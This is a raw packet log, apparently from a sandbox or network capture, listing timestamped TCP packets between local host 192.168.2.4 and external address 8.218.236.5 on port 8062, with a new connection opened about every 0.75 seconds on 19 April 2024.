Apr 19, 2024 09:51:29.650201082 CEST	8062	49850	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:29.652666092 CEST	8062	49850	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:29.652728081 CEST	49850	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:29.652733088 CEST	8062	49850	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:29.652776957 CEST	49850	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:29.652813911 CEST	49850	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:29.770713091 CEST	49851	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:29.968950033 CEST	8062	49850	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:30.081100941 CEST	8062	49851	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:30.081191063 CEST	49851	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:30.081418037 CEST	49851	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:30.392201900 CEST	8062	49851	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:30.394144058 CEST	8062	49851	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:30.394162893 CEST	8062	49851	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:30.394201040 CEST	49851	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:30.394236088 CEST	49851	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:30.394341946 CEST	49851	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:30.501419067 CEST	49852	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:30.704142094 CEST	8062	49851	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:30.823592901 CEST	8062	49852	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:30.823760986 CEST	49852	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:30.824151039 CEST	49852	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:31.146334887 CEST	8062	49852	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:31.148049116 CEST	8062	49852	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:31.148071051 CEST	8062	49852	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:31.148148060 CEST	49852	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:31.148199081 CEST	49852	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:31.148323059 CEST	49852	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:31.251174927 CEST	49853	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:31.470400095 CEST	8062	49852	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:31.563676119 CEST	8062	49853	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:31.563802004 CEST	49853	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:31.564205885 CEST	49853	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:31.876554966 CEST	8062	49853	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:31.878711939 CEST	8062	49853	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:31.878757954 CEST	8062	49853	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:31.878781080 CEST	49853	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:31.878853083 CEST	49853	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:31.878914118 CEST	49853	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:31.986687899 CEST	49854	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:32.191373110 CEST	8062	49853	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:32.298434973 CEST	8062	49854	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:32.298660994 CEST	49854	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:32.298789024 CEST	49854	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:32.610464096 CEST	8062	49854	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:32.612875938 CEST	8062	49854	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:32.612915993 CEST	8062	49854	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:32.617319107 CEST	49854	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:32.618220091 CEST	49854	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:32.720438957 CEST	49855	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:32.929629087 CEST	8062	49854	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:33.039132118 CEST	8062	49855	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:33.039376974 CEST	49855	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:33.039524078 CEST	49855	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:33.357902050 CEST	8062	49855	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:33.360610962 CEST	8062	49855	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:33.360644102 CEST	8062	49855	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:33.360905886 CEST	49855	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:33.361227989 CEST	49855	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:33.471033096 CEST	49856	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:33.679706097 CEST	8062	49855	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:33.785547018 CEST	8062	49856	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:33.785646915 CEST	49856	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:33.785928965 CEST	49856	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:34.100322962 CEST	8062	49856	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:34.102185965 CEST	8062	49856	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:34.102226973 CEST	8062	49856	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:34.102256060 CEST	49856	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:34.102339983 CEST	49856	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:34.102473021 CEST	49856	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:34.219885111 CEST	49857	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:34.416723967 CEST	8062	49856	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:34.543219090 CEST	8062	49857	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:34.543332100 CEST	49857	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:34.543570042 CEST	49857	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:34.866583109 CEST	8062	49857	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:34.868395090 CEST	8062	49857	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:34.868434906 CEST	8062	49857	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:34.868516922 CEST	49857	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:34.868518114 CEST	49857	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:34.868746042 CEST	49857	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:34.986303091 CEST	49858	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:35.191945076 CEST	8062	49857	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:35.304044962 CEST	8062	49858	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:35.304435968 CEST	49858	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:35.306139946 CEST	49858	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:35.623894930 CEST	8062	49858	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:35.625766039 CEST	8062	49858	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:35.625830889 CEST	8062	49858	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:35.625863075 CEST	49858	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:35.625963926 CEST	49858	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:36.210077047 CEST	49858	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:36.350066900 CEST	49859	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:36.528204918 CEST	8062	49858	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:36.685414076 CEST	8062	49859	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:36.685683966 CEST	49859	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:36.685766935 CEST	49859	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:37.021362066 CEST	8062	49859	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:37.023093939 CEST	8062	49859	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:37.023117065 CEST	8062	49859	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:37.023219109 CEST	49859	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:37.023319006 CEST	49859	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:37.126483917 CEST	49860	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:37.357948065 CEST	8062	49859	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:37.447803020 CEST	8062	49860	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:37.447917938 CEST	49860	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:37.448117971 CEST	49860	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:37.769244909 CEST	8062	49860	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:37.771071911 CEST	8062	49860	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:37.771096945 CEST	8062	49860	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:37.771147013 CEST	49860	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:37.771229029 CEST	49860	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:37.771262884 CEST	49860	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:37.876547098 CEST	49861	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:38.092478037 CEST	8062	49860	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:38.197977066 CEST	8062	49861	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:38.198093891 CEST	49861	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:38.198276997 CEST	49861	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:38.519342899 CEST	8062	49861	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:38.521215916 CEST	8062	49861	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:38.521245003 CEST	8062	49861	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:38.521308899 CEST	49861	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:38.521533966 CEST	49861	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:38.626624107 CEST	49862	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:38.841319084 CEST	8062	49861	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:38.942825079 CEST	8062	49862	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:38.942934036 CEST	49862	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:38.943152905 CEST	49862	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:39.259196043 CEST	8062	49862	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:39.261399031 CEST	8062	49862	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:39.261426926 CEST	8062	49862	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:39.261470079 CEST	49862	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:39.261509895 CEST	49862	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:39.261636972 CEST	49862	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:39.376538992 CEST	49863	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:39.578346968 CEST	8062	49862	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:39.695715904 CEST	8062	49863	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:39.695873976 CEST	49863	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:39.696171999 CEST	49863	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:40.013933897 CEST	8062	49863	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:40.015750885 CEST	8062	49863	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:40.015775919 CEST	8062	49863	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:40.015841961 CEST	49863	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:40.015841961 CEST	49863	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:40.015966892 CEST	49863	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:40.133251905 CEST	49864	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:40.335995913 CEST	8062	49863	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:40.457983971 CEST	8062	49864	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:40.458085060 CEST	49864	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:40.460066080 CEST	49864	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:40.784497023 CEST	8062	49864	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:40.786341906 CEST	8062	49864	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:40.786372900 CEST	8062	49864	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:40.786407948 CEST	49864	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:40.786461115 CEST	49864	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:40.786727905 CEST	49864	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:40.892952919 CEST	49865	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:41.111263990 CEST	8062	49864	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:41.209953070 CEST	8062	49865	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:41.210176945 CEST	49865	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:41.210257053 CEST	49865	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:41.527231932 CEST	8062	49865	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:41.529601097 CEST	8062	49865	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:41.529629946 CEST	8062	49865	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:41.529829025 CEST	49865	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:41.529829025 CEST	49865	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:41.529829025 CEST	49865	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:41.642719984 CEST	49866	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:41.847070932 CEST	8062	49865	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:41.979919910 CEST	8062	49866	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:41.980189085 CEST	49866	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:41.980277061 CEST	49866	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:42.313159943 CEST	8062	49866	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:42.315613031 CEST	8062	49866	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:42.315675974 CEST	8062	49866	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:42.318511963 CEST	49866	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:42.319200993 CEST	49866	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:42.426302910 CEST	49867	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:42.652151108 CEST	8062	49866	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:42.747807026 CEST	8062	49867	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:42.747919083 CEST	49867	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:42.748159885 CEST	49867	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:43.070106983 CEST	8062	49867	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:43.070779085 CEST	8062	49867	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:43.070821047 CEST	8062	49867	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:43.070944071 CEST	49867	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:43.070944071 CEST	49867	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:43.071063995 CEST	49867	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:43.189068079 CEST	49868	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:43.391635895 CEST	8062	49867	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:43.505080938 CEST	8062	49868	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:43.505783081 CEST	49868	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:43.505851030 CEST	49868	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:43.821582079 CEST	8062	49868	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:43.823240995 CEST	8062	49868	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:43.823290110 CEST	8062	49868	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:43.823376894 CEST	49868	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:43.823376894 CEST	49868	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:43.823487997 CEST	49868	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:43.942311049 CEST	49869	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:44.139000893 CEST	8062	49868	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:44.258650064 CEST	8062	49869	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:44.258974075 CEST	49869	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:44.259185076 CEST	49869	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:44.575221062 CEST	8062	49869	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:44.577069044 CEST	8062	49869	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:44.577109098 CEST	8062	49869	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:44.577138901 CEST	49869	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:44.577172995 CEST	49869	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:44.586817026 CEST	49869	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:44.705691099 CEST	49870	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:44.902669907 CEST	8062	49869	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:45.027184963 CEST	8062	49870	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:45.027403116 CEST	49870	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:45.027491093 CEST	49870	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:45.348819017 CEST	8062	49870	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:45.351557016 CEST	8062	49870	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:45.351583004 CEST	8062	49870	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:45.351607084 CEST	49870	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:45.351651907 CEST	49870	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:45.351708889 CEST	49870	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:45.456403017 CEST	49871	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:45.673089027 CEST	8062	49870	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:45.774467945 CEST	8062	49871	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:45.774632931 CEST	49871	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:45.774853945 CEST	49871	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:46.092472076 CEST	8062	49871	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:46.094233990 CEST	8062	49871	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:46.094280005 CEST	8062	49871	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:46.094407082 CEST	49871	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:46.095151901 CEST	49871	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:46.205346107 CEST	49872	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:46.413130045 CEST	8062	49871	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:46.530874014 CEST	8062	49872	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:46.530982971 CEST	49872	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:46.531208038 CEST	49872	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:46.857095003 CEST	8062	49872	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:46.861222982 CEST	8062	49872	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:46.861287117 CEST	8062	49872	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:46.861303091 CEST	49872	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:46.861355066 CEST	49872	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:46.861526012 CEST	49872	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:46.986323118 CEST	49873	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:47.186840057 CEST	8062	49872	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:47.308033943 CEST	8062	49873	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:47.308137894 CEST	49873	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:47.308343887 CEST	49873	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:47.629931927 CEST	8062	49873	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:47.633688927 CEST	8062	49873	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:47.633754015 CEST	8062	49873	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:47.636657000 CEST	49873	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:47.636657000 CEST	49873	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:47.752321959 CEST	49874	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:47.958657980 CEST	8062	49873	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:48.073144913 CEST	8062	49874	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:48.073460102 CEST	49874	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:48.073712111 CEST	49874	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:48.394018888 CEST	8062	49874	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:48.395981073 CEST	8062	49874	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:48.396044016 CEST	8062	49874	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:48.396253109 CEST	49874	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:48.396449089 CEST	49874	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:48.504733086 CEST	49875	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:48.717417002 CEST	8062	49874	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:48.818695068 CEST	8062	49875	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:48.818787098 CEST	49875	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:48.819000006 CEST	49875	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:49.131937981 CEST	8062	49875	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:49.133862972 CEST	8062	49875	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:49.133929014 CEST	8062	49875	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:49.133949041 CEST	49875	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:49.133979082 CEST	49875	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:49.134067059 CEST	49875	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:49.253408909 CEST	49876	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:49.446868896 CEST	8062	49875	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:49.578042984 CEST	8062	49876	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:49.578392982 CEST	49876	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:49.578393936 CEST	49876	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:49.903153896 CEST	8062	49876	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:49.905004978 CEST	8062	49876	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:49.905066967 CEST	8062	49876	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:49.905293941 CEST	49876	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:49.905411005 CEST	49876	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:50.017795086 CEST	49877	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:50.229832888 CEST	8062	49876	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:50.344260931 CEST	8062	49877	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:50.344501972 CEST	49877	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:50.344923973 CEST	49877	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:50.671185017 CEST	8062	49877	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:50.673481941 CEST	8062	49877	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:50.673523903 CEST	8062	49877	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:50.673542976 CEST	49877	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:50.673576117 CEST	49877	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:50.673695087 CEST	49877	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:50.789613008 CEST	49878	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:50.999840975 CEST	8062	49877	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:51.108239889 CEST	8062	49878	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:51.108419895 CEST	49878	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:51.108690977 CEST	49878	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:51.427030087 CEST	8062	49878	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:51.428894997 CEST	8062	49878	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:51.428935051 CEST	8062	49878	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:51.428987980 CEST	49878	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:51.429068089 CEST	49878	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:51.429136992 CEST	49878	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:51.534336090 CEST	49879	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:51.747669935 CEST	8062	49878	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:51.864847898 CEST	8062	49879	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:51.865041971 CEST	49879	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:51.865184069 CEST	49879	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:52.196712971 CEST	8062	49879	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:52.198462963 CEST	8062	49879	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:52.198530912 CEST	8062	49879	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:52.198705912 CEST	49879	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:52.198705912 CEST	49879	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:52.316864967 CEST	49880	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:52.529321909 CEST	8062	49879	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:52.630018950 CEST	8062	49880	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:52.630110025 CEST	49880	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:52.630413055 CEST	49880	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:52.943408966 CEST	8062	49880	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:52.945664883 CEST	8062	49880	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:52.945703983 CEST	8062	49880	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:52.945733070 CEST	49880	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:52.945769072 CEST	49880	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:52.945844889 CEST	49880	8062	192.168.2.4	8.218.236.5
